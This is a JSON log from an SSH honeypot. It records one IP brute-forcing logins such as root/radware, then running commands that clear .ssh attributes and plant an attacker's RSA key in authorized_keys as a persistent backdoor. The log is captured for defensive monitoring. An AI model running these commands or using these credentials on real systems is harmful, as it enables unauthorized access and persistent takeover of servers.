{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35404,"dst_ip":"1.2.3.4","dst_port":22,"session":"b89d29944894","protocol":"ssh","message":"New connection: 212.227.235.229:35404 (1.2.3.4:22) [session: b89d29944894]","sensor":"my-vps","timestamp":"2025-09-08T22:10:01.854923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:01.904464Z","src_ip":"212.227.235.229","session":"b89d29944894"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:02.123806Z","src_ip":"212.227.235.229","session":"b89d29944894"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"root123456","message":"login attempt [ubuntu/root123456] failed","sensor":"my-vps","timestamp":"2025-09-08T22:10:03.183996Z","src_ip":"212.227.235.229","session":"b89d29944894"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:04.389195Z","src_ip":"212.227.235.229","session":"b89d29944894"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46832,"dst_ip":"1.2.3.4","dst_port":22,"session":"b84539eee8e7","protocol":"ssh","message":"New connection: 212.227.235.229:46832 (1.2.3.4:22) [session: b84539eee8e7]","sensor":"my-vps","timestamp":"2025-09-08T22:10:05.859880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:05.860703Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:06.172004Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.login.success","username":"root","password":"radware","message":"login attempt [root/radware] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:10:07.455528Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:10:08.149492Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:10:08.150163Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:10:08.151406Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:08.462998Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:10:09.101059Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:10:09.101870Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:10:09.415519Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:09.416700Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36708,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ea6fa5b92bf","protocol":"ssh","message":"New connection: 212.227.235.229:36708 (1.2.3.4:22) [session: 6ea6fa5b92bf]","sensor":"my-vps","timestamp":"2025-09-08T22:10:09.724299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:09.725150Z","src_ip":"212.227.235.229","session":"6ea6fa5b92bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:10.036964Z","src_ip":"212.227.235.229","session":"6ea6fa5b92bf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:10:11.320565Z","src_ip":"212.227.235.229","session":"6ea6fa5b92bf"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:12.633708Z","src_ip":"212.227.235.229","session":"6ea6fa5b92bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36716,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b756dff7ab4","protocol":"ssh","message":"New connection: 212.227.235.229:36716 (1.2.3.4:22) [session: 4b756dff7ab4]","sensor":"my-vps","timestamp":"2025-09-08T22:10:12.942517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:12.943700Z","src_ip":"212.227.235.229","session":"4b756dff7ab4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:13.255919Z","src_ip":"212.227.235.229","session":"4b756dff7ab4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:10:14.546914Z","src_ip":"212.227.235.229","session":"4b756dff7ab4"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:14.859410Z","src_ip":"212.227.235.229","session":"b84539eee8e7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:14.860790Z","src_ip":"212.227.235.229","session":"4b756dff7ab4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60772,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bb0f328fc49","protocol":"ssh","message":"New connection: 212.227.235.229:60772 (1.2.3.4:22) [session: 5bb0f328fc49]","sensor":"my-vps","timestamp":"2025-09-08T22:10:16.832726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:16.833649Z","src_ip":"212.227.235.229","session":"5bb0f328fc49"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:17.126419Z","src_ip":"212.227.235.229","session":"5bb0f328fc49"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia2025","message":"login attempt [nvidia/nvidia2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:10:18.336515Z","src_ip":"212.227.235.229","session":"5bb0f328fc49"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:19.631820Z","src_ip":"212.227.235.229","session":"5bb0f328fc49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57010,"dst_ip":"1.2.3.4","dst_port":22,"session":"469521056a08","protocol":"ssh","message":"New connection: 212.227.235.229:57010 (1.2.3.4:22) [session: 469521056a08]","sensor":"my-vps","timestamp":"2025-09-08T22:10:24.053216Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53382,"dst_ip":"1.2.3.4","dst_port":22,"session":"85b8853e61b6","protocol":"ssh","message":"New connection: 212.227.235.229:53382 (1.2.3.4:22) [session: 85b8853e61b6]","sensor":"my-vps","timestamp":"2025-09-08T22:10:30.379295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:30.380513Z","src_ip":"212.227.235.229","session":"85b8853e61b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:30.690860Z","src_ip":"212.227.235.229","session":"85b8853e61b6"}
{"eventid":"cowrie.login.failed","username":"usertest","password":"1234567","message":"login attempt [usertest/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T22:10:31.971706Z","src_ip":"212.227.235.229","session":"85b8853e61b6"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:33.284188Z","src_ip":"212.227.235.229","session":"85b8853e61b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41312,"dst_ip":"1.2.3.4","dst_port":22,"session":"9eb670f377dd","protocol":"ssh","message":"New connection: 212.227.235.229:41312 (1.2.3.4:22) [session: 9eb670f377dd]","sensor":"my-vps","timestamp":"2025-09-08T22:10:39.528375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:39.529021Z","src_ip":"212.227.235.229","session":"9eb670f377dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:39.843437Z","src_ip":"212.227.235.229","session":"9eb670f377dd"}
{"eventid":"cowrie.login.failed","username":"app","password":"2025","message":"login attempt [app/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:10:41.137980Z","src_ip":"212.227.235.229","session":"9eb670f377dd"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:42.454823Z","src_ip":"212.227.235.229","session":"9eb670f377dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43220,"dst_ip":"1.2.3.4","dst_port":22,"session":"09f9f6f7c3fc","protocol":"ssh","message":"New connection: 212.227.235.229:43220 (1.2.3.4:22) [session: 09f9f6f7c3fc]","sensor":"my-vps","timestamp":"2025-09-08T22:10:47.799390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:47.800806Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:48.134140Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:10:49.003092Z","src_ip":"212.227.235.229","session":"469521056a08"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:10:49.004298Z","src_ip":"212.227.235.229","session":"469521056a08"}
{"eventid":"cowrie.session.closed","duration":"25.0","message":"Connection lost after 25.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:10:49.006444Z","src_ip":"212.227.235.229","session":"469521056a08"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer123","message":"login attempt [root/qwer123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:10:49.610556Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:10:50.344951Z","src_ip":"212.227.235.229","session":"09f9f6f7c3fc"}
